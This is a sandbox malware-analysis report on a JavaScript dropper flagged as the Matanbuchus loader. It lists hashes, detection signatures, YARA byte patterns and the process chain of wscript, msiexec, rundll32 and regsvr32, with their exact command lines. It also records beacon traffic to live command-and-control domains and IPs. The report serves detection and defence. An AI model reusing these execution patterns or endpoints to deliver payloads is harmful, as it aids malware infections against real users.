Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc_21-04-53.js

Overview

General Information

Sample name:Doc_21-04-53.js
Analysis ID:1570376
MD5:c10e7bce33b8d71ecd178565a63bb4ed
SHA1:b2c32607a225fe745dd4d1f40e78578621728be1
SHA256:09b473434edae856dc199c34092a9b4a9f735a0b0aeb1a03828fa215d1ce0237
Tags:BruteRatelC4jsLatrodectususer-k3dg3___
Infos:

Detection

Matanbuchus
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5520 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • msiexec.exe (PID: 2876 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6524 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DC MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • rundll32.exe (PID: 6004 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: EF3179D498793BF4234F708D3BE28633)
      • rundll32.exe (PID: 7096 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 1848 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 6204 cmdline: -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 5688 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 5956 cmdline: -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MatanbuchusAccording to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\silver\libcurl.dllJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
    C:\Users\user\8f08\724536\724536.winmdJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
      SourceRuleDescriptionAuthorStrings
      00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
      • 0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      • 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
      • 0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
      00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
      • 0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      • 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
      • 0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
      00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        5.2.rundll32.exe.4930000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
          11.2.regsvr32.exe.6b600000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
            7.2.regsvr32.exe.6b600000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
              5.2.rundll32.exe.6c310000.1.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                5.2.rundll32.exe.4930000.0.raw.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                  Click to see the 18 entries

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 7096, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", ProcessId: 5520, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.40.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 2876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                  Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 6204, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", ProcessId: 5520, ProcessName: wscript.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-06T22:11:58.099476+010020344681Malware Command and Control Activity Detected192.168.2.549785185.234.216.1754443TCP

                  Click to jump to signature section

                  Show All Signature Results
                  Source: unknownHTTPS traffic detected: 104.21.40.3:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49830 version: TLS 1.2
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB57CC4 FindFirstFileExW,5_2_7FB57CC4

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.5:49785 -> 185.234.216.175:4443
                  Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.234.216.175 443Jump to behavior
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49829
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 185.234.216.175:4443
                  Source: Joe Sandbox ViewASN Name: SPRINT-SDCPL SPRINT-SDCPL
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,5_2_7FB34390
                  Source: global trafficHTTP traffic detected: GET /klog.php HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: axizlhop.life
                  Source: global trafficHTTP traffic detected: GET /AdminAccounts.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: axizlhop.life
                  Source: global trafficDNS traffic detected: DNS query: security-patches.systems
                  Source: unknownHTTP traffic detected: POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: security-patches.systemsContent-Length: 525Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 32 67 31 54 30 5a 4d 51 32 31 50 61 57 35 34 64 7a 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 4b 32 31 6e 52 58 5a 44 62 6c 4e 79 61 45 45 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 6d 4a 32 56 57 35 61 55 58 6b 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 71 4b 31 64 48 65 44 68 73 4d 79 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 56 45 39 50 53 49 73 49 6e 5a 76 53 6d 4d 69 4f 69 4a 74 54 32 46 78 65 58 63 39 50 53 49 73 49 6e 64 42 59 30 67 69 4f 69 4a 78 54 30 4e 50 65 57 4e 7a 4d 32 46 6e 50 54 30 69 4c 43 4a 33 55 57 56 53 53 43 49 36 49 6a 4a 4d 4d 30 45 32 63 7a 56 33 49 69 77 69 65 47 56 44 59 32 70 54 49 6a 6f 69 64 53 39 78 52 6a 4a 6e 50 54 30 69 4c 43 4a 35 61 57 6c 56 57 46 6b 69 4f 69 4a 79 59 6b 38 34 4c 7a 67 31 63 55 6c 47 4c 7a 52 32 51 55 34 32 4f 56 49 32 62 32 39 75 4e 56 52 72 64 32 77 33 5a 47 4a 76 61 6e 68 6f 55 58 64 54 56 6d 64 59 52 57 64 4a 50 53 4a 39 Data Ascii: data=eyJBbldGaCI6InN0V2g1T0ZMQ21PaW54dz0iLCJGc3RMIjoicThyTjdwTXBCbktpK21nRXZDblNyaEE9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMmJ2VW5aUXkiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJqK1dHeDhsMyIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoidS9xRjJnPT0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9
                  Source: regsvr32.exeString found in binary or memory: http://schemas.xml
                  Source: rundll32.exe, 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlfilename_too_long
                  Source: wscript.exe, 00000000.00000002.2094931329.000001FCB11D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093594028.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093653008.000001FCAF401000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093697322.000001FCAF3CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094205442.000001FCAF3E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2094595142.000001FCAF3E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://axizlhop.life/klog.php
                  Source: wscript.exe, 00000000.00000003.2093594028.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093846419.000001FCAF3F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://axizlhop.life/klog.php6934511675634-100
                  Source: wscript.exe, 00000000.00000003.2094240029.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094103772.000001FCAF3FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093925424.000001FCAF3F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2094675050.000001FCAF3FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://axizlhop.life/klog.php6934511675634-100;
                  Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/
                  Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspx
                  Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspx4A
                  Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspxb
                  Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspxo
                  Source: rundll32.exe, 00000005.00000003.2169062650.00000000027E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspxv
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 104.21.40.3:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49707 version: TLS 1.2
